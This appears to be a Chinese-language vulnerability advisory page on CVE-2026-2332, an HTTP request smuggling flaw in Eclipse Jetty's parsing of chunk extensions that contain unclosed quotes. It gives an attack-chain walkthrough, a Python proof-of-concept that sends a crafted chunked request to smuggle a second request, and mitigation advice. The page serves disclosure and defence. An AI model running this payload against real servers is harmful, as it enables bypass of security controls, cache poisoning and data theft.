CVE-2026-2332 CVSS 7.4 高危

CVE-2026-2332 Eclipse Jetty HTTP请求走私漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2332

漏洞类型

HTTP请求走私

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse Jetty

漏洞概述

Eclipse Jetty的HTTP/1.1解析器在处理分块传输编码扩展时存在严重漏洞，导致请求走私。当分块扩展包含引用字符串时，Jetty错误地在字符串内的CRLF处终止解析。这种解析差异允许攻击者通过构造特制请求绕过安全检查，将恶意请求走私至后端应用，可能引发数据泄露或缓存中毒等严重后果。

技术细节

该漏洞根源于Eclipse Jetty对HTTP/1.1协议中分块传输编码解析的实现逻辑错误。具体而言，当解析器处理分块大小行中的扩展参数时，如果遇到包含未闭合双引号的字符串（例如 `1;ext="val`），Jetty会在随后的CRLF（`\r\n`）处停止解析，而不是抛出格式错误。这种行为违反了HTTP协议的健壮性原则，导致前端代理服务器与后端Jetty服务器对请求边界的认知产生分歧。攻击者利用这一“Funky Chunks”技术，可以在一个TCP连接中注入并隐藏第二个HTTP请求。这使得走私的请求可以绕过前端的安全控制（如WAF），直接作用于后端应用，进而可能导致账户劫持、敏感信息窃取或反射型XSS攻击。

攻击链分析

STEP 1

步骤1：构造恶意HTTP请求

攻击者创建一个HTTP POST请求，使用分块传输编码，并在分块大小行中插入包含未闭合双引号的扩展字段（如 `1;ext="val`）。

STEP 2

步骤2：发送请求至服务器

攻击者将构造好的恶意请求发送给运行Eclipse Jetty的服务器。

STEP 3

步骤3：触发解析差异

Jetty解析器错误地在未闭合引号后的CRLF处终止解析，导致后续数据被误认为是新的请求开始，而前端代理可能仍将其视为上一个请求的一部分。

STEP 4

步骤4：执行走私请求

后端服务器处理被“走私”的恶意请求，可能绕过安全检查执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# PoC for CVE-2026-2332: Jetty Request Smuggling via Unclosed Quotes in Chunk Extensions
# This script sends a malicious request with an unclosed quote in the chunk extension.

def send_smuggling_request(host, port):
    # Construct the malicious payload
    # The chunk extension `1;ext="val` is not closed with a quote before CRLF
    payload = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        "1;ext=\"val\r\n"  # Malformed chunk extension with unclosed quote
        "X\r\n"            # This part might be interpreted as the start of a smuggled request
        "0\r\n"            # Terminator
        "\r\n"
        "GET /smuggled HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    )

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload.encode('utf-8'))
        print(f"[+] Payload sent to {host}:{port}")
        print("[+] Check the backend server to see if the request was smuggled.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with target host and port
    target_host = "localhost"
    target_port = 8080
    send_smuggling_request(target_host, target_port)

影响范围

Eclipse Jetty (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议立即升级Jetty至修复了该漏洞的版本。如果无法立即升级，应在网络边界设备（如WAF）上实施检测规则，拦截包含未闭合引号或畸形分块扩展的HTTP请求，或者暂时禁用分块传输编码支持（如果业务允许）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表